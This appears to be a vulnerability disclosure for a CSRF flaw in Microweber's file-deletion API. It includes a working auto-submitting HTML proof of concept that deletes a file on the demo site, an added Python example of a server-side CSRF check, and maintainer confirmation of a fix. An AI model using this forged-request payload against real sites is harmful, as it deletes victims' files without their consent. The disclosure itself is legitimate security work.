Cross-Site Request Forgery (CSRF) in microweber/microweber

Status: Valid

Reported on Sep 13th 2021


Description

An attacker is able to delete any file in the Files module (if this module is enabled): there is no CSRF protection on this endpoint.

Proof of Concept

After opening the PoC.html file you can see that the file named 1.jpg is deleted.

PoC.html:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/media/delete_media_file">
      <input type="hidden" name="path&#91;&#93;" value="&#47;home&#47;demomicr&#47;public&#95;html&#47;demo&#47;userfiles&#47;media&#47;default&#47;1&#46;jpg" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
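The protection this endpoint was missing, as an added illustration that is not part of the report or of Microweber's code: a server-side CSRF gate in Python for a delete endpoint like the one above. The `Request` class, `SITE_ORIGIN` and the `_token` parameter name are assumptions; the check refuses the GET-plus-`_method` override the PoC relies on, requires a same-origin Origin/Referer, and compares a per-session token in constant time.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Origin the delete endpoint is served from (taken from the PoC's form action).
SITE_ORIGIN = "https://demo.microweber.org"

@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request (hypothetical, not Microweber's)."""
    method: str
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)

def issue_csrf_token(session: dict) -> str:
    """Mint a per-session synchronizer token, store it server side, return it."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token

def is_csrf_safe(req: Request) -> bool:
    """Gate a state-changing call such as delete_media_file:
    1. only a genuine POST may proceed (the PoC is a GET form relying on the
       `_method=POST` override, which is deliberately ignored here);
    2. Origin, or Referer as fallback, must be the site's own origin;
    3. the submitted `_token` must equal the session token (constant-time compare)."""
    if req.method.upper() != "POST":
        return False
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if source != SITE_ORIGIN and not source.startswith(SITE_ORIGIN + "/"):
        return False
    expected = req.session.get("csrf_token")
    supplied = req.params.get("_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), str(supplied).encode())

if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Shape of the PoC: cross-site GET form, victim's cookies attached, no token, foreign Referer.
    forged = Request("GET", {"Referer": "https://attacker.example/"},
                     {"path[]": "/userfiles/media/default/1.jpg", "_method": "POST"}, session)
    legit = Request("POST", {"Origin": SITE_ORIGIN},
                    {"path[]": "/userfiles/media/default/1.jpg", "_token": token}, session)
    print("forged blocked:", not is_csrf_safe(forged), "| legit allowed:", is_csrf_safe(legit))
```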
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Peter Ivanov validated this vulnerability 3 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 6fb8d8 3 months ago
Peter Ivanov has been awarded the fix bounty
api_callbacks.php#L160-L168 has been validated
media.php#L11-L20 has been validated
Peter Ivanov (Maintainer), 3 months ago:

Thanks for the report, the issue is fixed now.